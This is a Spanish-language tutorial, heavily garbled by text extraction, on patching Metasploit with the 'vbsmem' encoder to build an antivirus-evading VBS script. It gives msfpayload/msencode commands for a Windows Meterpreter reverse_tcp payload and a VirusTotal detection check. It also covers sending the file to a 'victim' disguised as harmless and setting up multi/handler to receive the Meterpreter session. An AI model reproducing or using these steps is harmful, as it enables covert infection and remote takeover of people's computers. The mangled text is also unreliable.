Generando script malicioso con Metasploit Framework Expositor: K43L
Metasploit Es un proyecto OpenSource de seguridad inormatica !ue proporciona inormaci"n acerca de #ulnera$ilidades y ayuda en test de penetraci"n y en el desarrollo de irmas para para Sistemas de %etecci"n de &ntrusos' Su su$proyecto mas conocido es el amoso Metasploit Framework( una )erramienta para desarrollar y e*ecutar exploits contra una ma!uina remota'
VbsMem Encoding El #$smem es un parc)e( algo as+ como un encoding !ue los desarrolladores de metasploit )an implementado precisamente para indetectar arc)i#os maliciosos rente a los anti#irus( el parc)e lo puedes descargar desde el siguiente link: )ttp:,,de#'metasploit'com,redmine,attac)ments ,-./,#$smem01'2'1'patc)
$smem en Metasploit El parc)e !ue necesitamos implementar en nuestro metasploit es precisamente este( el cual nos permitir permitir generar scripts muc)o mas eicientes rente a la detecci"n de los anti#irus' El codigo uente del parc)e lo podemos apreciar en el link anterior( claramente se puede #er !ue esta programado en ru$y( por lo cual se de$e tener algo de conocimiento $asico so$re este lengua*e para poder lle#ar a ca$o nuestro o$*eti#o'
Modiicando el arc)i#o exe'r$ 5ien( antes de seguir de$emos de aplicar el parc)e al metasploit( pero de$emos de modiicar el arc)i#o exe'r$ !ue se encuentra en el siguiente directorio: /opt/metasploit/msf3/lib/msf/util Este arc)i#o contiene codigo en ru$y al igual !ue el parc)e !ue aca$amos de descargar y contiene toda la coniguracion !ue nos permite encodear arc)i#os maliciosos dentro del metasploit y entre otras cosas' La re#ision !ue se tiene de este arc)i#o es la re#ision 16647 seg8n mi arc)i#o de coniguracion' Mientras !ue la re#isi"n del parc)e es la #ersi"n 11793( asi !ue podria !uedar inser#i$le nuestro Metasploit en caso de de !ue ocurra algun pro$lema con las #ersiones'
Modiicando el arc)i#o exe'r$ ara !ue no )aya pro$lemas #amos a editar el arc)i#o manualmente( antes de )acer la modiicacion respecti#a( #amos )acer una copia de nuestro arc)i#o original de la siguiente manera con permisos de root: cp exe'r$ exe'r$0original El anterior comando lo e*ecutamos desde la terminal con permisos de root desde el directorio donde se encuentra el arc)i#o r$'exe
;nali
o eso parece? @rea un nue#o ic)ero data/templates/vbsmem.vbs( !ue es una plantilla para la creaci"n de los ic)eros'
Editando el fichero exe.rb 5ien para )acer esto( a$rimos el arc)i#o exe'r$ con un editor de textos plano( en mi caso use el gedit y pueden a$rir el arc)i#o con el siguiente comando: sudo gedit exe'r$ Aal y como muestra la siguiente imagen:
Copiando cdigo fuente 5ien a)ora para continuar( copiamos la unci"n toBwin32B#$smem desde desde el parc)e )acia nuestro arc)i#o exe'r$( tomando en cuenta !ue de$emos de$emos de de $orrar los comentarios !ue estn el la unci"n CD ya !ue si no $orramos los comentarios el c"digo copiado no tiene ninguna uncionalidad
!magen"# Copiando la $uncin vbsmem
!magen 2# %egando la $uncin Vbsmem
&claraciones sobre el Copiado/%egado 5ueno( se de$e aclarar !ue la unci"n del #$smem lo de$emos copiar sin el signo CD como mencione anteriormente( tam$in de$emos darnos cuenta !ue )ay !ue copiar la unci"n al inali
Editando mas opciones %espus de reali
when 'vbsmem' output = Msf::Util::EXE.to_win32_vbsmem(framewor! "o#e! e$eopts% e$eopts%
when 'vbs' o%tp%t = Msf::Util::EXE.to_win32pe_vbs(fraewor!" co#e" exeopts.er&e( :persist = false )$$
Editando mas 'pciones %espus de reali
(uardando los cambios en el archivo exe.rb 5ien( llegados )asta este punto el siguiente paso !ue se de$e reali
!magen 3# Creando el archivo vbsmem.vbs
(enerando nuestro )cript malicioso ;)ora el siguiente paso es generar el script malicioso para en#iarle a la ma!uina #ictima( de esta orma podremos inectar su m!uina y tener acceso respecti#amente' 5ien para generar nuestro script malicioso nos #amos al siguiente directorio: ,pentest,exploits,ramework 5ien una #e< u$icados en ese directorio( el siguiente paso es usar la utilidad de Cmspayload !ue nos permitir crear nuestro script malicioso( introducimos el siguiente comando en la s)ell ',mspayload windows,meterpreter,re#erseBtcp l)ostI1.'.'.'3 lportI6666 J msencode t #$smem ,root,descargas,exploit'#$s
!magen *# Creacin del script malicioso
&claraciones sobre la creacin del script malicioso 5ueno( antes de seguir se de$en )acer algunas aclaraciones so$re la creaci"n del script malicioso( ca$e mencionar !ue en el comando anterior #e+amos como creamos el script( el mismo !ue se encuentra en el directorio ,root,descargas,exploit'#$s( claramente se puede #er !ue se trata de un script en #isual $asic'
Comprobando nuestro script malicioso ara compro$ar si nuestro script es Cindetecta$le Cindetecta$le nos nos #amos a la siguiente we$: )ttps:,,www'#irustotal'com, %esde la direcci"n anterior podremos anali
!magen +# Comprobando nuestro archivo malicioso
,etalles sobre la comprobacin de nuestro archivo malicioso 5ien como se puede #er en la imagen anterior( nuestro script es detectado por 3 de 43 anti#irus( de los cuales el 8nico !ue cono
!nfectando la m-uina vctima con el script malicioso 5ueno( a)ora procedemos a en#iarle el arc)i#o malicioso a la ma!uina #+ctima( esto se reali
,e0ando a la escucha Metasploit $ramewor1 5ien a)ora desde el mismo directorio de donde creamos el script malicioso #amos a conigurar nuestro metasploit para !ue se !uede a la escuc)a de las posi$les conexiones de !ue #allamos a tener desde la ma!uina #+ctima( con el siguiente comando: ',msconsole %espus de reali
,e0ando a la escucha Metasploit $ramewor1 ; continuaci"n se muestran los comandos !ue de$eremos introducir una #e< !ue cargue el Metasploit Framework: use multi/handler set paload windows/meterpreter/reverse_tcp set lhost "4.4.4.3 set lport ++++ exploit 50
!magen 6# ,e0ando a la escucha el Metasploit $ramewor1
E0ecutando el script malicioso desde la mauina vctima 5ien a)ora esperamos !ue la #+ctima e*ecute nuestro arc)i#o malicioso( antes de continuar ca$e aclarar !ue para !ue nuestro script no sea sospec)oso( podemos usar otras utilidades para camular y para !ue la #+ctima no #aya a sospec)ar de !ue se trata de un malware'
!magen 7# E0ecucin del script malicioso
!magen 8# &briendo una sesin Meterpreter